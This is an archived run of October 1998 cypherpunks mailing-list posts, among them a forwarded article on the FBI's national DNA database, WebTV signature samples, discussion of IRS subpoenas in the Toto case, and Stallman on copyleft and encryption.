Subject: IP: Privacy Fears: FBI's DNA Database
Message-ID: <199810132203.PAA10570@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy Fears: FBI's DNA Database
Date: Tue, 13 Oct 1998 08:54:57 -0500
To: believer@telepath.com

Source:  San Jose Mercury News
http://www.mercurycenter.com/premium/front/docs/dnadata12.htm

Published Monday, October 12, 1998, in the San Jose Mercury News 

DNA database offers promise -- and privacy fears

BY NICHOLAS WADE
New York Times 

In a computer at a secret location, the FBI will open a national
DNA database Tuesday that advocates say could significantly
reduce rape and other crimes by helping to catch repeat offenders
earlier.

The database, with a new generation of forensic DNA
techniques, promises to be so efficient that some civil libertarians
fear it will be expanded from people convicted of crimes to
include almost everyone, giving the government inordinate
investigative powers over citizens.

The national DNA database consists of 50 databases run by the
states but unified by common test procedures and software
designed by the FBI. As of Tuesday, it will be possible to
compare a DNA sample from a suspect or crime scene in one
state with all others in the system.

The national database has been nearly a decade in the making.
The final pieces fell into place in June when Rhode Island became
the last state to set up a DNA database.

But the system still faces many unresolved issues, which are likely
to play out according to the reaction from the public and the
courts. One such issue is what types of offenders should be
included. Another is whether the mass screening of suspects'
DNA will prove constitutional.

DNA, the chemical that embodies a person's genetic
programming, can be found almost everywhere. People shed a
constant torrent of dead skin cells. Criminals leave blood when
breaking and entering; they shed hair and skin cells in fights,
deposit saliva on glasses and leave sweat stains in head bands.
>From only a few cells in such sources, enough DNA can be
extracted to identify the owner. A DNA database of sufficient
size could presumably help solve many crimes.

Britain's experience

The crime-fighting potential of DNA databases is becoming
evident from the experiences of Britain, which started earlier and
has had fewer administrative and constitutional hurdles to
overcome. The database there initially focused on sex offenses
but has spread to include burglaries and car theft because of the
high number of DNA matches that police forces were obtaining.
Moreover, there was considerable crossover, at least in Britain,
among different kinds of offenses.

``People who commit serious crime very often have convictions
for petty crime in their history, so if you could get them on the
database early you may prevent serious crime,'' said David
Werrett, manager of the DNA database for England and Wales.

The English DNA database includes entries from crime scenes
and from everyone convicted of a crime, as well as from suspects
in unresolved cases. Since the system's debut in 1995, it has
matched 28,000 people to crime scenes and has made 6,000
links between crime scenes. The database now holds 360,000
entries and Werrett said he expected it would eventually include
one-third of all English males between 16 and 30, the principal
ages for committing crimes.

Werrett said the database has grown because police forces in
England, which pay $55 for a DNA analysis, are finding it
cost-effective. Recently the Police Superintendents Association
called for the entire population to be DNA-tested.

Forensic use of DNA in the United States is unlikely to go as fast
or as far as in Britain.

``Their system makes a tremendous amount of sense the way they
approach it, but in the United States we have a different
perspective on privacy and on the extent to which we would be
willing to depend on a database,'' said Christopher Asplen,
executive director of the national Commission on the Future of
DNA Evidence.

One privacy safeguard

One major privacy safeguard in the FBI's system is that only a
minute fraction of a person's genetic endowment becomes part of
the database. Under a new DNA profiling system known as
STRs, for short tandem repeats, a person's DNA is tested at 13
specific sites at which a short length of DNA is repeated in a kind
of stutter. The number of repeats is highly variable from one
person to another, so that measuring the number of repeats at the
13 designated sites gives a way of identifying each individual with
a probability of one in several billion.

The blood or other samples donated by individuals are retained
by the states in collections known as DNA banks. All that goes
into the computerized DNA databases is the set of 13 numbers
from the STR measurements. Only identifying information, and
nothing about a person's health or appearance, can be divined
from the STRs.

Access to the DNA database is permitted only for law
enforcement purposes, with a $100,000 fine for unauthorized
disclosures. No known breaches of the system have occurred.

One major unresolved issue is that of the types of offenders from
whom DNA profiles should be taken. All states require people
convicted of serious sexual offenses to donate blood samples, but
states differ on requiring samples from other groups such as
people convicted of violent felonies, juvenile offenders and
parolees.

Four states -- Virginia, Wyoming, New Mexico and Alabama --
require all people convicted of a felony to provide samples for
DNA profiling. Louisiana allows DNA to be taken from people
merely arrested in a crime, a practice that has not been tested in
the courts.

Databases upheld

State laws establishing DNA databases have been challenged in
13 jurisdictions and have been upheld in all but one, in
Massachusetts. Some states have revised their original legislation
to add offenses.

``I think the trend is that 10 years from now all felonies will be
covered,'' said M. Dawn Herkenham, chief of the FBI's Forensic
Science Systems Unit in Washington. ``We recommend that all
violent felonies, burglaries, juveniles and retroactivity for people
on parole be included.''

>From his office in Birmingham, England, last week, Werrett said,
``Today, we have issued matches on three murders, five rapes,
nine serious robberies, two abductions and two violent
burglaries.''

No state DNA database has acquired the critical mass to furnish
such a hit rate. Many state laboratories are understaffed and have
large backlogs of DNA samples to analyze. The backlogs are
particularly worrisome in the case of rapes where specimens may
lie unanalyzed while the rapist assaults more victims. The case
backlog problem is compounded because state laboratories are
switching to the STR method of DNA profiling from an older
method of analysis called RFLP, for restriction fragment length
polymorphism. All the samples analyzed by RFLP must be
redone by STR if they are to be searchable in the new database.

When these teething problems are overcome, many experts
believe that the state and national DNA database systems may
have a significant effect, particularly in reducing crimes such as
rape that often involve repeat offenders. But like other experts
involved with DNA testing, Asplen expressed concern that DNA
profiling be developed in a publicly acceptable way. ``The public
does need to have a trust level with this and be assured that law
enforcement is not going to abuse this powerful tool,'' he said. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 13 Oct 1998 21:45:26 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Hidden WebTV signatures
Message-ID: <199810131310.PAA12090@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have no idea to wherre to begin an analysis....  The begining is noticably
the same.  with more variation the farther along.  A header or version
identifier?  obviosly can't be a straight hash.

At 04:55 PM 10/11/98 , you wrote:
>
>On 11 Oct 1998 15:57:33 -0500, Anonymous <nobody@replay.com> wrote:
>
>>
>>Peter Gutmann writes:
>>
>>> For those of you who don't read sci.crypt, Robert Ames <gnome@istar.ca>
has 
>>> posted an article in which he observes that all WebTV posts contain an 
>>> X-WebTV-Signature: line containing base64-encoded data.  For samples of 
>>> WebTV-generated posts, try the alt.weemba newsgroup, which is filled
with 
>>> WebTV-user drool (caution: remember to employ protection when exposting
your 
>>> mind to the content of the messages).  Some samples:
>>>  
>>> X-WebTV-Signature: 1
>>>         ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU=

>>> X-WebTV-Signature: 1
>>>         ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG

>>
>>Could someone grep their news spool for a few hundred of these signatures
>>and post them here?  We can do statistical analysis on them and determine
>>whether they all appear to be modulo the same q value.
>
>
>Here ya go.  313 webtv sigs
>
>-- Phelix
>
>
>
>	ETAtAhQeHk0+b8Au0iGpkJrZtwhsU2MVoAIVAJR/nr45zMDoq1G526NRP+3jHVIb 
>	ETAtAhUAiWMjaBJx75P5wCgIxslClcSUU4cCFHT6dVYU49dtEvX4HCI4bcmEiKBU 
>	ETAsAhRLS36vm1OTCBG3CIAwMpdtg3fR1gIUdgWUE1cbbagEl7VbQvsengViPHc= 

-----BEGIN PGP SIGNATURE-----
Version: PGP Cyber-Knights Templar build 5.5.3ckt

iQEVAwUBNiNNzaKPqmf00ZAbAQGtuwf8DCEKYf1rBbNCgCraoROS/62RfvZ6pmau
nvt+5lF5r6Lk6xEEFz5XoMz+loIW/Y2MRZ9Wly9t9pIDa6r+o+g6AI3RMpjio0Mn
b04MZL3uHLcKaxo7yThocc8CVUlQRoap7FfHPkMoUH04CpfJtWcS/E3IfsAPXovW
w2XG6N9bEJbLyxc1I9dGSb63WRHE5ADbzgGkUKhNJirgZukdBLn/KMrnhsjeOlUT
+sLMTHiH5/5NbXl+Te7+jV/BBUgYDnz3kZAZrQo0XTBzgG4J8ORg8s3NmCA0j120
vxpXTRgay43OYJEACLeRWhUcONdmdffuqqUQ5AmAaTDj9hRPZlPXNA==
=U1Fq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 14 Oct 1998 05:40:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What it's like to get a subpoena (re Toto) (fwd)
Message-ID: <199810132108.QAA07675@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 13 Oct 1998 21:14:41 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: What it's like to get a subpoena (re Toto)

> Perhaps they lack proof that the message in question was sent to the
> list, very little is signed, and Toto surrounded himself with
> forgeries.

True, there is also the issue of SMTP forgeries. Since there is no host
authentication your security is as strong as your trust. His signing the
message raises some interesting issues, especialy with the subsequent
developments related to signature strength.

> Not that it makes much difference that I can see -- the issue is
> surely whether CJ wrote the post, and whether the post and the AP
> mockup constitutes a credible threat.  (That they apparently think
> Toto's AP mockup was credible shows a lack of understanding).

The officers I talked to in person admitted to not knowing about Bell or AP.
Their interest seemed to be related solely to issues about threats to
specific individuals or locations within the IRS infrastructure.

My impression was that from their perspective this was just another subpeona
delivery and interview. They each had a list of questions/notes and they
basicly looked to be going down the list and filling in blanks.

> I don't see why they're bothering you, I wonder if the other majordomo
> operators have received, or shortly will receive similar visits.

I raised the same issue with the agent in Seattle via phone. He seemed to
comprehend the mundane role a mailing list operator leads, especialy since
I don't keep archives nor moderate the traffic. He was at least willing to
discuss depositions and such. If luck is on my side they'll let me explain
how SSZ works in regards the CDR as well as what Toto/CJ/aka said to me
directly via phone and in person.

> Perhaps we could send archive URLs to Jeff Gordon.

I made sure to explain how to get Cypherpunks archives via Yahoo with the
two agents this morning. I also explained the very ad hoc nature of
participation in the CDR and why users come and go.

I even got to explain how the remailer works by using an example involving a
spammer. They were quite clear on what a spammer was and how they distribute
traffic.

> > Please don't call or send private email requesting further
> > details. They didn't ask me to keep any of our discussion
> > confidential but until I better understand what is going on I'm
> > taking the conservative course (I had a big fight with myself about
> > whether to even post this).
> 
> Well thanks for making it.  I say make it all public, FWIW.

I agree in principle. Now whether particular circumstances will allay their
wills to mine is another issue entirely. In particular since I'm going to be
testifying before a grand jury in Washington state versus Texas is something
that tells me I don't know all the ground rules possibly. Especialy since I
can't have a lawyer present during questioning (and I thought the only
stipulation with council was a value exceeding $20), that bothers my
Constitutional constitution more than I care to admit.



    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 14 Oct 1998 05:20:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Soccer Moms?
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
Message-ID: <v04020a0cb24965eb5fa6@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Actually, we've been persistant victims of a misspelling, here.

According to Rush Limbaugh, the true spelling, evidently, is "Sucker", not
"Soccer" Moms.

Just what they've been sucking, I suppose I would as an exercise to the
reader, though I bet they didn't inhale more than once without getting a
severe um, headache, and we all know that "blow" is just an expression...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 14 Oct 1998 06:28:02 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: What it's like to get a subpoena (re Toto)y
In-Reply-To: <199810132014.VAA12469@server.eternity.org>
Message-ID: <199810132202.RAA20785@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I have not been reading the list lately, but, is that story with
Toto still going on? Is he in jail or something? If yes, please
pass him along my moral support if that is feasible. Perhaps I will
start reading the list again.

igor

PS No visits from the IRS yet.


Adam Back wrote:
> 
> 
> Jim Choate writes about his visit from IRS agents in relation to Toto.
> 
> Jim Choate writes:
> > I was visited by two nicely mannerd IRS agents this morning. We
> > talked for about an hour or so about Cypherpunks, CJ, Austin,
> > majordomo, etc. In the process I was served with a subpoena from the
> > Western District of Washington [...]
> > 
> > I explained how majordomo works, how to manipulate majordomo to get
> > lists of subscribers (I used the SSZ subscriber list as an example),
> > and described the time in July (I believe) when CJ/Toto/aka visited
> > the local meeting. We also discussed the potential for altering
> > email traffic through a remailer.
> 
> Perhaps they lack proof that the message in question was sent to the
> list, very little is signed, and Toto surrounded himself with
> forgeries.
> 
> Not that it makes much difference that I can see -- the issue is
> surely whether CJ wrote the post, and whether the post and the AP
> mockup constitutes a credible threat.  (That they apparently think
> Toto's AP mockup was credible shows a lack of understanding).
> 
> > I've made it clear I have no problems answering their questions but
> > have no desire to go to Seattle in Nov. or any other time. They are
> > looking into whether a deposition given here would be sufficient for
> > their needs. Until then I'm getting ready for a 2-3 day trip to
> > Seattle in Nov.....
> 
> I don't see why they're bothering you, I wonder if the other majordomo
> operators have received, or shortly will receive similar visits.
> 
> Perhaps we could send archive URLs to Jeff Gordon.
> 
> > I'm currently trying to decide whether to scan and post the subpoena
> > on the SSZ webpage.
> 
> Sure please do.
> 
> > It's interesting that they requested archives of the list. 
> 
> I would have thought Jeff Gordon, the IRS agent investigating Toto,
> would be subscribed to the list, at least via an alias.
> 
> Also, there are several operational cypherpunks list archives
> remaining.
> 
> > Please don't call or send private email requesting further
> > details. They didn't ask me to keep any of our discussion
> > confidential but until I better understand what is going on I'm
> > taking the conservative course (I had a big fight with myself about
> > whether to even post this).
> 
> Well thanks for making it.  I say make it all public, FWIW.
> 
> Adam
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 14 Oct 1998 06:24:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Soccer Moms?
In-Reply-To: <v03130305b24926e40bb9@[209.66.100.146]>
Message-ID: <v04020a0fb2497d87eecf@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:27 PM -0400 on 10/13/98, Robert Hettinga wrote:

> Just what they've been sucking I suppose I would leave as an exercise to
> the reader, though I bet they didn't inhale more than once without getting
> a severe um, headache, and we all know that "blow" is just an expression...

Okay, maaaaybe I was just a liiiitle bit misogynistic there.

My considerable apologies to those I offended with the above...

Cheers,
Bob Hettinga

PS: No, I didn't get any mail about this, it's a real-live, genuine,
recantation.
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 14 Oct 1998 07:23:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What it's like to get a subpoena (re Toto) (fwd)
Message-ID: <199810132308.SAA08748@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 13 Oct 1998 18:25:01 -0400
> From: John Young <jya@pipeline.com>
> Subject: Re: What it's like to get a subpoena (re Toto) (fwd)

> It's tough being the earliest ones contacted, having to decide
> as Tom and Jim have had to do about whether to go public
> or deal with the inquiries in private and hope that nothing worse
> develops.

That's what worries me, once the snowball gets rolling... I mean jeesh, I
run a program that handles email. This sort of stuff is exactly why I don't
like interacting with people via private email unless I know them personaly
(ie via non-electronic means). The software is publicly available and
certainly doesn't need me to explain it. While I can see some interest in
wanting to know what CJ/Toto/aka said to me that night on the phone and the
next day at the physical meet, it makes me wonder exactly what am I
*supposed* to know about...

> It's that switch from friendly and couterous to the other that
> none of want to think about, eh? "You're under arrest. Anything
> you say can and will be used against you." Hmm, what was I
> saying, posting, here.

Ahmen. Though a more insidous threat is the 'network' that gets built out of
it. I wonder if this means every time some bozo I happen to run across goes
postal I'm going to be 'investigated'? I wonder how long a name stays on
those (probably) non-existant lists?

> Makes a more convincing case to have a live body telling the
> facts of the matter, explaining how things work, somewhat eager 
> to instruct and please, in self-preservation, to keep the cops and
> court friendly and courteous. What was told to the investigators 
> in private, that's what hung Jim Bell and CJ.

That was the ultimate reason that I went ahead and posted it. That way
somebody *besides* me knew about it.

> Then the friendly folks came for you and me, working a list.

Which is the reason I'm talking to a lawyer to find out specificaly what is
going on. I mean in my own self interest and the continued existance of
TAG:SSZ it seems to be the thing to do. As far as I know I won't have access
to council once I'm in there.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 14 Oct 1998 06:58:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What it's like to get a subpoena (re Toto) (fwd)
In-Reply-To: <199810132108.QAA07675@einstein.ssz.com>
Message-ID: <199810132233.SAA20920@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate's sharing his experiences with the IRS is
very welcome, as with Tom Allard forwarding the Jeff
Gordon request for assistance.

Other inquiries of folks on the list will probably happen,
and information about those would be beneficial. It would be
a great help to post here any other overtures, anonymous
if preferred.

It's tough being the earliest ones contacted, having to decide
as Tom and Jim have had to do about whether to go public
or deal with the inquiries in private and hope that nothing worse
develops.

It's likely that more serious targets will be approached later,
using material obtained from those not at risk, those with
no reason to fear the friendly, courteous IRS.

At least that's what happened with Jim Bell and CJ. They, too,
said they were handled in a friendly courteous manner until ... 
the case was presented to a magistrate.

According to CJ's sister even the shrink at Springfield is
the friendliest most courteous person she's talked to, helpful, 
considerate, and said he had CJ's interest at heart. She said 
she just hoped he didn't cut off CJ's medicine, cause him to 
go berzerk, then to disappear.

It's that switch from friendly and couterous to the other that
none of want to think about, eh? "You're under arrest. Anything
you say can and will be used against you." Hmm, what was I
saying, posting, here.

BTW, the offshore archives, if they are offshore, are a problem
for getting legal access to, and to use in court. I think a human 
linkage is preferred, in deposition, in court, testifying for the record.

Makes a more convincing case to have a live body telling the
facts of the matter, explaining how things work, somewhat eager 
to instruct and please, in self-preservation, to keep the cops and
court friendly and courteous. What was told to the investigators 
in private, that's what hung Jim Bell and CJ.

But, hey, they were nuts, right? Fuck them. 

Then the friendly folks came for you and me, working a list.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SDN <sdn@divcom.slimy.com>
Date: Wed, 14 Oct 1998 10:00:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: FYI: More on WebTV security
In-Reply-To: <v04011722b24904a8f519@[139.167.130.246]>
Message-ID: <19981013183214.A26717@divcom.slimy.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Oct 13, 1998 at 11:58:37AM -0500, Steve Bryan wrote:
> Has anyone hacked WebTV to enable a terminal to connect to a plain vanilla
> ISP (or better yet a local ethernet) or is it inexorably tied to their
> network of proxy servers? I get the impression that like a Newton or any
> other graphically limited device a WebTV browser would have to be aided by
> a proxy server that translates the content to more amenable form before it
> can take a crack at it. If it were possible to divorce it from their
> service it might be a nifty device for less than $100. This would become
> especially appealing if 128 bit crypto were thrown into the bargain.

The WebTV units are in fact tied to the WebTV service.  You can use another
ISP to reach the service, though, at a reduced cost.  (Search for OpenISP
at webtv.net.)  Retrofitting ethernet onto a box isn't practical.

The proxy servers do transform data, but I don't think the software in the
box requires it.  My understanding was that the transformations were just
for faster downloads, and did things like rescale images.  It doesn't matter
much, because there isn't a way to avoid using them.

More relevant to the list, the threat model for the WebTV service/box is
primarily concerned about loss of user data, forgotten passwords, and
unsecured data over the public internet.  It's not worried about privacy
from WebTV insiders.

As a result, all user data is stored on the service, traffic to and from the
box is encrypted, and data isn't hidden from the customer care people.

If that doesn't fit what you want out of it (and it doesn't seem very
close to a consensus cypherpunks threat model), don't get one.  I think
it's the best attempt at an easy-to-use network computer on the market,
but I don't use one myself.  It's not what I want.

Jon Leonard

The above opinions are mine and not WebTV's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Oct 1998 10:10:26 +0800
To: cypherpunks@toad.com
Subject: Earn your worth not mlm!!! 330-258-9131
Message-ID: <199810140141.SAA13879@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I AM LOOKING FOR 2 TO 4 PEOPLE WHO ARE READY TO TAKE CHARGE OF THEIR
FINANCIAL FUTURE!! IF YOU CONSIDER YOURSELF OVER WORKED AND UNDER PAID
AND WOULD LIKE TO BE IN A DIFFERENT POSITION 6 MONTHS FROM NOW,
CALL THIS 1 MINUTE MESSAGE THAT WILL EMPOWER YOU FOR THE FUTURE. 
This is not multilevel or network marketing!!(330) 258-9131 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@gnu.org>
Date: Wed, 14 Oct 1998 09:08:40 +0800
To: cypherpunks@cyberpass.net
Subject: Two? ways people could use your code
Message-ID: <199810140046.UAA06980@psilocin.gnu.org>
MIME-Version: 1.0
Content-Type: text/plain



People have brought up the argument of the two classes of possible
users of a library: those who want to write a free program, and those
who want to write a proprietary program.

This is a valid approach, but we must consider all the terms in the
equation.  There are actually three classes of possible projects that
might use code you have written:

* Those who want to make a free program.
* Those who want to make a proprietary program.
* Those who don't have strong views about the matter.

So let's look at each of these three cases, considering two available
choices (copylefting, or not copylefting), and how the decision
affects the goals of encouraging use of encryption, discouraging back
doors, and encouraging users' freedom.

* Some people believe in free software and will make their additions
  free no matter what.  Whether you use copyleft makes no difference
  in this kind of case.

* Often at companies, and sometimes at universities, people are dead
  set on making a proprietary program.  This program may be capable of
  doing a job, but its users will not have freedom, and they will have
  to take it on faith that there are no backdoors.

  Copylefting your code says this project cannot use it.  Most likely,
  the project will spend some extra money to write their own code, and
  the outcome for the public will be much the same.  They might do a
  worse job, or a better job.  There's some chance they would not do
  the project; whether that is a loss for the public is not clear.  It
  could mean less use of encryption; but if you also care about
  avoiding secret back doors, and about users' freedom, you won't see
  this as an unambiguous loss.

* Often at universities, and sometimes at companies, people decide to
  write a program but don't think about whether to make it free
  software.  They may not care, they may dislike thinking about the
  issue, they may simply not understand that there is an issue.

  In these cases, they will probably judge your code by its features,
  not by its distribution terms.  If they want to use your code, and
  your terms say that's permitted only if their program is free,
  they'll say, "Ok, I'll make it free, and use your code."

  In this kind of case, using copyleft will produce a benefit: more
  freedom for the end user, who can check, rather than trust, that
  there are no back doors in the program.

Conclusion: if you care *only* about more use of encryption, and
*absolutely not* about secret back doors or users' freedom, then you
would find it a better strategy not to copyleft.

But if you care about encouraging use of encryption, about
discouraging back doors, and about freedom for software users,
copyleft (such as the GNU GPL) is a good way of promoting all of these
goals together.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Oct 1998 12:29:05 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <199810140141.DAA25717@replay.com>
Message-ID: <v03130307b249d4908a73@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:41 PM -0700 10/13/98, Anonymous wrote:
>Dear BlackNet,
>
>TOTO Enterprises, Bienfait, Saskatchewan hereby offers
>for sale sog's key under the BlackNet anonymous
>information market.
>
>Payments must be in anonymous ecash delivered to a
>digital dead drop to be arranged later.
>
>Or alternatively, we are willing to take bids in
>bottles of Scotch delivered to TOTO Key Escrow
>Services, Box 281, Bienfait, Saskatchewan SOC OMO.

Hey, I could tell you all that BlackNet was used a while back to distribute
some of the keys used by The Performance Artist Sometimes Known as Toto.

But that then might earn _me_ a subpoena, so I won't.

There are more things in cyberspace than are dreamt of in our religions,
Horatio Alger (hiss).

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 04:52:59 +0800
To: ravage@EINSTEIN.ssz.com
Subject: Re: What it's like to get a subpoena (re Toto)
In-Reply-To: <199810131927.OAA07077@einstein.ssz.com>
Message-ID: <199810132014.VAA12469@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate writes about his visit from IRS agents in relation to Toto.

Jim Choate writes:
> I was visited by two nicely mannerd IRS agents this morning. We
> talked for about an hour or so about Cypherpunks, CJ, Austin,
> majordomo, etc. In the process I was served with a subpoena from the
> Western District of Washington [...]
> 
> I explained how majordomo works, how to manipulate majordomo to get
> lists of subscribers (I used the SSZ subscriber list as an example),
> and described the time in July (I believe) when CJ/Toto/aka visited
> the local meeting. We also discussed the potential for altering
> email traffic through a remailer.

Perhaps they lack proof that the message in question was sent to the
list, very little is signed, and Toto surrounded himself with
forgeries.

Not that it makes much difference that I can see -- the issue is
surely whether CJ wrote the post, and whether the post and the AP
mockup constitutes a credible threat.  (That they apparently think
Toto's AP mockup was credible shows a lack of understanding).

> I've made it clear I have no problems answering their questions but
> have no desire to go to Seattle in Nov. or any other time. They are
> looking into whether a deposition given here would be sufficient for
> their needs. Until then I'm getting ready for a 2-3 day trip to
> Seattle in Nov.....

I don't see why they're bothering you, I wonder if the other majordomo
operators have received, or shortly will receive similar visits.

Perhaps we could send archive URLs to Jeff Gordon.

> I'm currently trying to decide whether to scan and post the subpoena
> on the SSZ webpage.

Sure please do.

> It's interesting that they requested archives of the list. 

I would have thought Jeff Gordon, the IRS agent investigating Toto,
would be subscribed to the list, at least via an alias.

Also, there are several operational cypherpunks list archives
remaining.

> Please don't call or send private email requesting further
> details. They didn't ask me to keep any of our discussion
> confidential but until I better understand what is going on I'm
> taking the conservative course (I had a big fight with myself about
> whether to even post this).

Well thanks for making it.  I say make it all public, FWIW.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Oct 1998 12:38:13 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: Ex-NSA Cryptanalyst
In-Reply-To: <199810140139.VAA01903@dewdrop2.mindspring.com>
Message-ID: <v03130308b249d5cbd4c1@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:31 PM -0700 10/13/98, John Young wrote:
>We'd like to get the affidavit, search warrants and complaint
>for the ex-NSA cryptanalyst, David Sheldon Boone, arrested
>for spying to see what the specific allegations are. See court
>docket below.
>
>News reports say he is being held in Alexandria, VA, so a
>lead to a legal doc retrieval service in that area would be
>appreciated.
>
>Or should anyone have the docket-listed docs, copies would be
>welcomed:

This focus on former list members is getting tiresome.

We knew him as Davy Boone, of course, and helped him develop new modes of
communication to undermine the state. The proprietary managerial techniques
he transferred to the Soviets, helping to turn them into Pointy Hair
Managers, hastened the collapse of the U.S.S.R.

Something all crypto anarchists should support.

And for this Davy Boone is being persecuted? Gimme a break.

We need more digital cutouts, not fewer.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 14 Oct 1998 09:59:30 +0800
To: cypherpunks@cyberpass.net
Subject: Ex-NSA Cryptanalyst
Message-ID: <199810140139.VAA01903@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We'd like to get the affidavit, search warrants and complaint 
for the ex-NSA cryptanalyst, David Sheldon Boone, arrested 
for spying to see what the specific allegations are. See court 
docket below. 

News reports say he is being held in Alexandria, VA, so a
lead to a legal doc retrieval service in that area would be
appreciated. 

Or should anyone have the docket-listed docs, copies would be 
welcomed:

Fax: 212-799-4003

Snail:

John Young
251 West 89th Street, Suite 6E
New York, NY 10024

Vox: 212-873-8700

X---------------------------------------------------------------------------X
PACER session date: Tuesday October 13, 1998 09:29:28 PM EST


Docket as of October 13, 1998 6:21 pm               Page 1

Proceedings include all events.
1:98m 882-ALL USA v. Boone

                       U.S. District Court
            Eastern District of Virginia (Alexandria)

            CRIMINAL DOCKET FOR CASE #: 98-M -882-ALL

